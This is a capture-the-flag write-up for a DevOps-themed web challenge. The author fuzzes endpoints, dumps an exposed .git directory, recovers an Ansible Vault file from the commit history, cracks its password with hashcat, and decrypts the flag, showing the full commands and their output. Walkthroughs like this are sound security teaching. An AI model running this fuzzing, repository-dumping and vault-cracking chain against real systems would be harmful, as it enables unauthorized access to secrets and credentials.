Flag4All : Devops

Statement:

One of your friends is learning the wonderful work of DevOps and invites you to check out his site. He tells you that it’s deployed and managed according to the DevOps practices he’s learned. However, he needs to work a little harder on security…

https://devoops.flag4all.sh

Author : 0xlildoudou (BZHack)

I start by fuzzing endpoints running on the given URL :

ffuf -w ~/git/SecLists/Fuzzing/fuzz-Bo0oM.txt -u "https://devoops.flag4all.sh/FUZZ"


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0
________________________________________________

 :: Method           : GET
 :: URL              : https://devoops.flag4all.sh/FUZZ
 :: Wordlist         : FUZZ: /home/sanlokii/git/SecLists/Fuzzing/fuzz-Bo0oM.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.git/                   [Status: 403, Size: 153, Words: 3, Lines: 8, Duration: 19ms]
.git/config             [Status: 200, Size: 92, Words: 9, Lines: 6, Duration: 19ms]
.git                    [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 13ms]
.git/index              [Status: 200, Size: 305, Words: 3, Lines: 4, Duration: 13ms]
.git/logs/HEAD          [Status: 200, Size: 819, Words: 41, Lines: 6, Duration: 14ms]
.git/logs/refs          [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 26ms]
.git/logs/              [Status: 403, Size: 153, Words: 3, Lines: 8, Duration: 29ms]
.git/HEAD               [Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 28ms]
index.html              [Status: 200, Size: 27, Words: 5, Lines: 1, Duration: 13ms]
:: Progress: [4842/4842] :: Job [1/1] :: 2100 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I see that the .git directory is exposed, so I’m going to use the git-dumper tool to retrieve the contents locally :

git-dumper https://devoops.flag4all.sh/.git /tmp/git

[-] Testing https://devoops.flag4all.sh/.git/HEAD [200]
[-] Testing https://devoops.flag4all.sh/.git/ [403]
[-] Fetching common files
[-] Fetching https://devoops.flag4all.sh/.git/hooks/commit-msg.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/COMMIT_EDITMSG [200]
[-] Fetching https://devoops.flag4all.sh/.git/description [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-applypatch.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-commit.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/applypatch-msg.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/post-update.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/post-receive.sample [404]
[-] https://devoops.flag4all.sh/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-push.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-rebase.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/post-commit.sample [404]
[-] https://devoops.flag4all.sh/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.gitignore [404]
[-] https://devoops.flag4all.sh/.gitignore responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-receive.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/index [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/update.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/info/exclude [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/info/packs [404]
[-] https://devoops.flag4all.sh/.git/objects/info/packs responded with status code 404
[-] Finding refs/
[-] Fetching https://devoops.flag4all.sh/.git/info/refs [404]
[-] Fetching https://devoops.flag4all.sh/.git/ORIG_HEAD [404]
[-] https://devoops.flag4all.sh/.git/info/refs responded with status code 404
[-] https://devoops.flag4all.sh/.git/ORIG_HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/HEAD [200]
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/heads/master [200]
[-] Fetching https://devoops.flag4all.sh/.git/FETCH_HEAD [404]
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/master [404]
[-] https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/master responded with status code 404
[-] https://devoops.flag4all.sh/.git/FETCH_HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/stash [404]
[-] https://devoops.flag4all.sh/.git/logs/refs/stash responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/HEAD [404]
[-] https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/config [200]
[-] Fetching https://devoops.flag4all.sh/.git/refs/remotes/origin/HEAD [404]
[-] https://devoops.flag4all.sh/.git/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/logs/HEAD [200]
[-] Fetching https://devoops.flag4all.sh/.git/refs/heads/master [200]
[-] Fetching https://devoops.flag4all.sh/.git/packed-refs [404]
[-] https://devoops.flag4all.sh/.git/packed-refs responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/refs/remotes/origin/master [404]
[-] Fetching https://devoops.flag4all.sh/.git/refs/wip/wtree/refs/heads/master [404]
[-] https://devoops.flag4all.sh/.git/refs/remotes/origin/master responded with status code 404
[-] https://devoops.flag4all.sh/.git/refs/wip/wtree/refs/heads/master responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/refs/stash [404]
[-] Fetching https://devoops.flag4all.sh/.git/refs/wip/index/refs/heads/master [404]
[-] https://devoops.flag4all.sh/.git/refs/stash responded with status code 404
[-] https://devoops.flag4all.sh/.git/refs/wip/index/refs/heads/master responded with status code 404
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching https://devoops.flag4all.sh/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] https://devoops.flag4all.sh/.git/objects/00/00000000000000000000000000000000000000 responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/objects/50/c8f89388baa410afdfc9c2fc8c35a129acf38f [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/e9/a45f6b5624ac920af2cbc38c15451e15d09b9d [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/a0/2c53a5e7a305dd7e20d3bcf1c17c979f2bab97 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/36/54f3ab8c69f2454bc92c4d0a74658e4bbd1619 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/fa/e74d667441a668193e0e25c0e8a89fa91695c0 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/69/c2e48c84927a7987764868fff94ae1ceb3551e [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/0a/7aad9c7a133ed8def842b5e21b98fb02bfc8b3 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/14/b0157ed359ae21f7ae00b0714b7c7802e057f3 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/5f/630a81ced302a5d2a1b8cd106ce783726a184f [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/3a/552a610b4545f644ba0224ad6d5fcf5c8ec6e5 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/07/e713c33e88323570db685f87c9afede0791b8d [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/ad/61dba8369f92be71c3496e6306f73315202e95 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/c0/51b87c889213195bc429012b531cdc11af31e6 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/91/374d99a4f7ffbfb68af1130f2443e9e3f0ce76 [200]
[-] Running git checkout .

I run a git log to display the latest commits :

commit fae74d667441a668193e0e25c0e8a89fa91695c0 (HEAD -> master)
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:01 2023 +0000

    Remove the vault

commit 3654f3ab8c69f2454bc92c4d0a74658e4bbd1619
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:01 2023 +0000

    add more ansible security

commit 69c2e48c84927a7987764868fff94ae1ceb3551e
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:00 2023 +0000

    remove log

commit 0a7aad9c7a133ed8def842b5e21b98fb02bfc8b3
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:00 2023 +0000

    add update playbook

commit 5f630a81ced302a5d2a1b8cd106ce783726a184f
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:50:59 2023 +0000

    Add index

Inspecting the contents of the commits, I notice the presence of a file encrypted with ansible vault :

git show 3654f3ab8c69f2454bc92c4d0a74658e4bbd1619

commit 3654f3ab8c69f2454bc92c4d0a74658e4bbd1619
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:01 2023 +0000

    add more ansible security

diff --git a/vault.txt b/vault.txt
new file mode 100644
index 0000000..07e713c
--- /dev/null
+++ b/vault.txt
@@ -0,0 +1,7 @@
+$ANSIBLE_VAULT;1.1;AES256
+35333634626634613035353634623737306439616563666463636237333261306435363865386665
+3130633139353236303762396363366633363061303466300a336436333130396432396234633530
+63306638663834643361613331323535303530336464653766353036386632386531323835666166
+6237303966313765320a333236376461626633333830356262303133383530613939646232623434
+65643565613365363665343438366563313463333333316163636463613965323630346465326663
+6632633765666331363335663838646662626564656334336166

With the ansible2john module of the John the Ripper tool, I get the following hash :

ansible2john.py vault.txt

vault.txt:$ansible$0*0*5364bf4a05564b770d9aecfdccb732a0d568e8fe10c1952607b9cc6f360a04f0*3267dabf33805bb013850a99db2b44ed5ea3e66e4486ec14c3331accdca9e2604de2fcf2c7efc1635f88dfbbedec43af*3d63109d29b4c50c0f8f84d3aa312550503dde7f5068f28e1285fafb709f17e2

I then use hashcat to crack the vault password :

hashcat -a 0 -m 16900 '$ansible$0*0*5364bf4a05564b770d9aecfdccb732a0d568e8fe10c1952607b9cc6f360a04f0*3267dabf33805bb013850a99db2b44ed5ea3e66e4486ec14c3331accdca9e2604de2fcf2c7efc1635f88dfbbedec43af*3d63109d29b4c50c0f8f84d3aa312550503dde7f5068f28e1285fafb709f17e2' --wordlist rockyou.txt

$ansible$0*0*5364bf4a05564b770d9aecfdccb732a0d568e8fe10c1952607b9cc6f360a04f0*3267dabf33805bb013850a99db2b44ed5ea3e66e4486ec14c3331accdca9e2604de2fcf2c7efc1635f88dfbbedec43af*3d63109d29b4c50c0f8f84d3aa312550503dde7f5068f28e1285fafb709f17e2:netadmin

I now know that the password is netadmin, I use it to retrieve the plaintext value from the vault.txt file :

ansible-vault decrypt vault.txt
Vault password: netadmin
Decryption successful

cat vault.txt                                                                             
FLAG{UsE_4ns1Bl3_WiTh_Strong_P@ssw0rd}

Flag: FLAG{UsE_4ns1Bl3_WiTh_Strong_P@ssw0rd}